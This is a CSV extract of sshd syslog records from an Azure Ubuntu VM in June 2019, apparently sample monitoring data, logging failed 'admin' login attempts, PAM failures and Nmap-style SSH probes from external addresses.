+112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:45,UbuntuDevEnv,2019-06-28 08:34:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:48,UbuntuDevEnv,2019-06-28 08:34:47,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 61.83.31.89 port 40960 ssh2,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:48,UbuntuDevEnv,2019-06-28 08:34:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:50,UbuntuDevEnv,2019-06-28 08:34:49,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 61.83.31.89 port 40960 ssh2 [preauth],13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:50,UbuntuDevEnv,2019-06-28 08:34:49,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 61.83.31.89 port 40960 ssh2,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:50,UbuntuDevEnv,2019-06-28 08:34:49,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:50,UbuntuDevEnv,2019-06-28 08:34:49,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.83.31.89,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,61.83.31.8,,0,
+119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:50,UbuntuDevEnv,2019-06-28 08:34:49,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 61.83.31.89 port 40960: Too many authentication failures [preauth],13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 09:49:29,UbuntuDevEnv,2019-06-28 09:49:28,auth,UbuntuDevEnv,info,Received disconnect from 209.141.35.48 port 60652:11: Bye Bye [preauth],29715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,209.141.35.4,60652,,
+121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 09:49:29,UbuntuDevEnv,2019-06-28 09:49:28,auth,UbuntuDevEnv,info,Disconnected from 209.141.35.48 port 60652 [preauth],29715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,209.141.35.4,60652,,
+122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 10:07:43,UbuntuDevEnv,2019-06-28 10:07:43,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.182 port 33419,33690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,33419,,
+123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 10:07:44,UbuntuDevEnv,2019-06-28 10:07:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 10:07:44,UbuntuDevEnv,2019-06-28 10:07:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.182,33690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.1,,0,
+125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 10:07:46,UbuntuDevEnv,2019-06-28 10:07:45,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.182 port 33419 ssh2,33690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,33419,,
+126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 10:07:46,UbuntuDevEnv,2019-06-28 10:07:46,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.182 port 33419: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",33690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,33419,,
+127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 10:50:27,UbuntuDevEnv,2019-06-28 10:50:26,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 41904 [preauth],43284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,41904,,
+128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:03:34,UbuntuDevEnv,2019-06-28 11:03:34,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 48968 [preauth],46110,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,48968,,
+129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:16:45,UbuntuDevEnv,2019-06-28 11:16:44,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 56052 [preauth],49027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,56052,,
+130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:00,UbuntuDevEnv,2019-06-28 11:21:00,auth,UbuntuDevEnv,info,Did not receive identification string from 52.137.93.128 port 2817,49918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,52.137.93.1,2817,,
+131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:05,auth,UbuntuDevEnv,info,Bad protocol version identification '\003' from 52.137.93.128 port 2842,49949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2842,,
+132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:05,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2839,49953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2839,,
+133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:05,auth,UbuntuDevEnv,info,Bad protocol version identification 'GET / HTTP/1.1' from 52.137.93.128 port 2832,49951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2832,,
+134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:05,auth,UbuntuDevEnv,info,Protocol major versions differ for 52.137.93.128 port 2838: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.5-Nmap-SSH1-Hostkey,49950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2838,,
+135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:05,auth,UbuntuDevEnv,info,Protocol major versions differ for 52.137.93.128 port 2840: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.5-NmapNSE_1.0,49952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2840,,
+136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:05,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2843,49954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2843,,
+137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:06,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2845,49957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2845,,
+138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:06,auth,UbuntuDevEnv,info,Unable to negotiate with 52.137.93.128 port 2844: no matching host key type found. Their offer: ssh-dss [preauth],49956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2844,,
+139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:06,UbuntuDevEnv,2019-06-28 11:21:06,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2846,49962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2846,,
+140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:07,UbuntuDevEnv,2019-06-28 11:21:06,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2848,49969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2848,,
+141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:07,UbuntuDevEnv,2019-06-28 11:21:06,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2849,49971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2849,,
+142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:07,UbuntuDevEnv,2019-06-28 11:21:07,auth,UbuntuDevEnv,info,Connection closed by 52.137.93.128 port 2847 [preauth],49968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,52.137.93.1,2847,,
+143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:07,UbuntuDevEnv,2019-06-28 11:21:07,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2850,49972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2850,,
+144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:07,UbuntuDevEnv,2019-06-28 11:21:07,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2853,49977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2853,,
+145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:08,UbuntuDevEnv,2019-06-28 11:21:07,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2856,49979,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2856,,
+146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:08,UbuntuDevEnv,2019-06-28 11:21:07,auth,UbuntuDevEnv,info,Connection closed by 52.137.93.128 port 2852 [preauth],49975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,52.137.93.1,2852,,
+147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:08,UbuntuDevEnv,2019-06-28 11:21:07,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2857,49980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2857,,
+148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:08,UbuntuDevEnv,2019-06-28 11:21:08,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2859,49983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2859,,
+149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:08,UbuntuDevEnv,2019-06-28 11:21:08,auth,UbuntuDevEnv,info,Unable to negotiate with 52.137.93.128 port 2858: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth],49981,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2858,,
+150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:09,UbuntuDevEnv,2019-06-28 11:21:08,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2861,49987,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2861,,
+151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:09,UbuntuDevEnv,2019-06-28 11:21:08,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2862,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2862,,
+152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:09,UbuntuDevEnv,2019-06-28 11:21:08,auth,UbuntuDevEnv,info,Unable to negotiate with 52.137.93.128 port 2860: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth],49986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2860,,
+153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:09,UbuntuDevEnv,2019-06-28 11:21:09,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2864,49991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2864,,
+154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:09,UbuntuDevEnv,2019-06-28 11:21:09,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2865,49998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2865,,
+155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:10,UbuntuDevEnv,2019-06-28 11:21:09,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2866,50000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2866,,
+156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:10,UbuntuDevEnv,2019-06-28 11:21:09,auth,UbuntuDevEnv,info,Connection closed by 52.137.93.128 port 2863 [preauth],49990,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,52.137.93.1,2863,,
+157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:10,UbuntuDevEnv,2019-06-28 11:21:09,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2867,50001,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2867,,
+158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:10,UbuntuDevEnv,2019-06-28 11:21:10,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2868,50003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2868,,
+159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:10,UbuntuDevEnv,2019-06-28 11:21:10,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2869,50005,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2869,,
+160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:11,UbuntuDevEnv,2019-06-28 11:21:10,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2870,50007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2870,,
+161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:11,UbuntuDevEnv,2019-06-28 11:21:10,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2871,50008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2871,,
+162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:11,UbuntuDevEnv,2019-06-28 11:21:11,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2872,50009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2872,,
+163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:11,UbuntuDevEnv,2019-06-28 11:21:11,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2873,50011,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2873,,
+164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:12,UbuntuDevEnv,2019-06-28 11:21:11,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2874,50013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2874,,
+165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:12,UbuntuDevEnv,2019-06-28 11:21:11,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2875,50014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2875,,
+166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:12,UbuntuDevEnv,2019-06-28 11:21:12,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2876,50015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2876,,
+167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:12,UbuntuDevEnv,2019-06-28 11:21:12,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2877,50018,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2877,,
+168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:13,UbuntuDevEnv,2019-06-28 11:21:12,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2878,50019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2878,,
+169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:13,UbuntuDevEnv,2019-06-28 11:21:12,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2879,50020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2879,,
+170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:13,UbuntuDevEnv,2019-06-28 11:21:13,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2624,50021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2624,,
+171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:13,UbuntuDevEnv,2019-06-28 11:21:13,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2625,50024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2625,,
